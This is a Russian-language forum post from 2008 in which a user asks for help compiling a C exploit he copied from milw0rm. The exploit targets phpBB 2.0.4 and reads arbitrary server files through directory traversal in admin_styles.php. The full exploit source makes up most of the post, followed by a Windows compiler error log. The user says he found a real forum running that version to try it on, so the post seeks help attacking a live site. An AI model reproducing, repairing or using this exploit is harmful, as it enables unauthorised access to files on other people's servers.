| Zipper-rus |
10.08.2008 22:57 |
Помогите настроить Си сплоит
кароче хотел испробывать Си сплоит на форуме phpbb 2.0.4 , кароче форум такой версии я нашёл зашёл потом на страницу Уязвимостей форумов phpbb и нашёл для этого форума Сплоит
phpBB <= 2.0.4
Цель: просмотр содержимого файлов на сервере
Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
Exploit: http://milw0rm.com/id.php?id=47
Захожу на http://milw0rm.com/id.php?id=47 копируй оттуда код и сохраняю в формате Си , вот сам код:
Цитата:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
int main()
{
//The socket stuff
struct hostent *hp;
struct sockaddr_in sa;
int sock;
//The input stuff
char server[100];
char location[100];
char sfile[100];
int escapes;
char* file;
//The request stuff
char* request;
char* postdata;
char* header;
//The buffer to store the response
char buffer[4096];
int tworeturns = 0;
int showing = 0;
//Other
int i;
//Ask the server
printf("Server: ");
scanf("%100s", server);
printf("Forum location: ");
scanf("%100s", location);
printf("Directories to escape: ");
scanf("%i", &escapes);
printf("File to get/execute: ");
scanf("%100s", sfile);
//Start the exploit!
printf("\n\nStarting the exploit...\n");
//Connect to the server
printf("Creating socket... ");
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Failed!\n");
return 0;
} else{ printf("Done!\n");
}
printf("Looking up server IP... ");
if((hp = gethostbyname((char*)server)) == NULL)
{
printf("Failed!\n");
return 0;
} else { printf("Done!\n");
}
printf("Connecting %s:80... ", server);
memcpy(&sa.sin_addr, hp->h_addr_list[0], hp->h_length);
sa.sin_family = AF_INET;
sa.sin_port = htons(80);
if(connect(sock, (struct sockaddr*)&sa, sizeof(sa)))
{
printf("Failed!\n");
return 0;
} else { printf("Done!\n");
}
//Create the request
printf("Building request... ");
//Create the postdata
file = (char*)malloc(sizeof(char) * (escapes * 3 + strlen(sfile) + 1));
while(escapes > 0)
{
if(escapes == 1)
{
sprintf(file, "%s%s%s", file, "..", sfile);
} else { sprintf(file, "%s%s", file, "../");
}
escapes --;
}
postdata = (char*)malloc((27 + strlen(file)) * sizeof(char));
sprintf(postdata, "send_file= &install_to=%s%s00", file, "%");
header = (char*)malloc((170 + strlen(server) + strlen(location)) *
sizeof(char));
sprintf(header, "POST /%s/admin/admin_styles.php?mode=addnew
HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost:
%s\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", location, server,
strlen(postdata));
request = (char*)malloc((strlen(postdata) + strlen(header) + 1) *
sizeof(char));
sprintf(request, "%s%s", header, postdata);
printf("Done!\n");
//Send the request
printf("Sending request... ");
write(sock, request, strlen(request));
printf("Done!\n");
printf("\nResponse:\n");
//Get the response
while(recv(sock, buffer, 4096, 0) != 0)
{
for(i = 0; i < strlen(buffer); i++)
{
//Only show the character when it should
if(showing == 1)
{
printf("%c", buffer[ i ]);
}
//Stop showing from \n<br>\n
if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
buffer[i + 3] == 'r' && buffer[i + 4] == '>' && buffer[i + 5] == '\n' &&
showing == 1)
{
showing = 0;
tworeturns = 0;
}
//Or from \n<br />\n
if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' &&
buffer[i + 3] == 'r' && buffer[i + 4] == ' ' && buffer[i + 5] == '/' &&
buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1)
{
showing = 0;
tworeturns = 0;
}
//If there's a return and tworeturns = true, start showing it
if(buffer[ i ] == '\n' && tworeturns == 1)
{
showing = 1;
}
//If there are two returns, set tworeturns to true and add 3 to i
if(buffer[ i ] == '\r' && buffer[i + 1] == '\n' && buffer[i + 2] == '\r'
&& buffer[i + 3] == '\n')
{
tworeturns = 1;
i += 3;
}
}
}
printf("\n");
return 0;
}
|
Потом скачал видео по компиляции сплоита и делал как там в итоге куча ошибок вот они :
Цитата:
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.
C:\Documents and Settings\Администратор>../
".." не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
C:\Documents and Settings\Администратор>../]
".." не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
C:\Documents and Settings\Администратор>cd ../..
C:\>cd lcc
C:\lcc>lcc bin
"lcc" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
C:\lcc>cd bin
C:\lcc\bin>lcc.exe sploit.c
cpp: sploit.c:3 Could not find include file <sys/socket.h>
cpp: sploit.c:4 Could not find include file <netinet/in.h>
cpp: sploit.c:5 Could not find include file <netdb.h>
cpp: sploit.c:101 Unterminated string or char const
cpp: sploit.c:103 Unterminated string or char const
Error sploit.c: 8 undefined size for 'incomplete struct sockaddr_in defined at
c:\lcc\bin\sploit.c 8 sa'
Warning sploit.c: 47 missing prototype for socket
Warning sploit.c: 47 Missing prototype for 'socket'
Error sploit.c: 47 undeclared identifier 'AF_INET'
Error sploit.c: 47 undeclared identifier 'SOCK_STREAM'
Warning sploit.c: 56 missing prototype for gethostbyname
Warning sploit.c: 56 Missing prototype for 'gethostbyname'
Error sploit.c: 56 operands of = have illegal types 'pointer to incomplete stru
ct hostent defined at c:\lcc\bin\sploit.c 7' and 'int'
Error sploit.c: 56 operands of == have illegal types 'int' and 'pointer to void
'
Warning sploit.c: 65 missing prototype for memcpy
Warning sploit.c: 65 Missing prototype for 'memcpy'
Error sploit.c: 65 unknown field 'sin_addr' of 'incomplete struct sockaddr_in d
efined at c:\lcc\bin\sploit.c 8'
Error sploit.c: 65 unknown field 'h_addr_list' of 'incomplete struct hostent de
fined at c:\lcc\bin\sploit.c 7'
Error sploit.c: 65 type error: pointer expected
Error sploit.c: 65 unknown field 'h_length' of 'incomplete struct hostent defin
ed at c:\lcc\bin\sploit.c 7'
Error sploit.c: 66 unknown field 'sin_family' of 'incomplete struct sockaddr_in
defined at c:\lcc\bin\sploit.c 8'
Warning sploit.c: 66 possible usage of AF_INET before definition
Error sploit.c: 67 unknown field 'sin_port' of 'incomplete struct sockaddr_in d
efined at c:\lcc\bin\sploit.c 8'
Warning sploit.c: 67 missing prototype for htons
Warning sploit.c: 67 Missing prototype for 'htons'
Warning sploit.c: 68 missing prototype for connect
Warning sploit.c: 68 Missing prototype for 'connect'
Error sploit.c: 68 invalid type argument 'incomplete struct sockaddr_in defined
at c:\lcc\bin\sploit.c 8' to 'sizeof'
Warning sploit.c: 80 missing prototype for malloc
Warning sploit.c: 80 Missing prototype for 'malloc'
Warning sploit.c: 80 missing prototype for strlen
Warning sploit.c: 80 Missing prototype for 'strlen'
Warning sploit.c: 93 Missing prototype for 'malloc'
Warning sploit.c: 93 Missing prototype for 'strlen'
Warning sploit.c: 96 Missing prototype for 'malloc'
Warning sploit.c: 96 Missing prototype for 'strlen'
Warning sploit.c: 96 Missing prototype for 'strlen'
Error sploit.c: 99 undeclared identifier 'HTTP'
Error sploit.c: 99 illegal character '\'
Error sploit.c: 99 type error in argument 2 to `sprintf'; found 'double' expect
ed 'pointer to const char'
Error sploit.c: 99 syntax error; found `r' expecting ')'
Warning sploit.c: 99 sprintf expects a char pointer as first arg, got double
Error sploit.c: 99 Syntax error; missing semicolon before `r'
Error sploit.c: 99 illegal character '\'
Error sploit.c: 99 undeclared identifier 'r'
Warning sploit.c: 99 Statement has no effect
Error sploit.c: 99 Syntax error; missing semicolon before `nContent'
Error sploit.c: 99 too many errors
C:\lcc\bin>
|
Кароче кто разбирается подскажите как исправить ошибку ! |
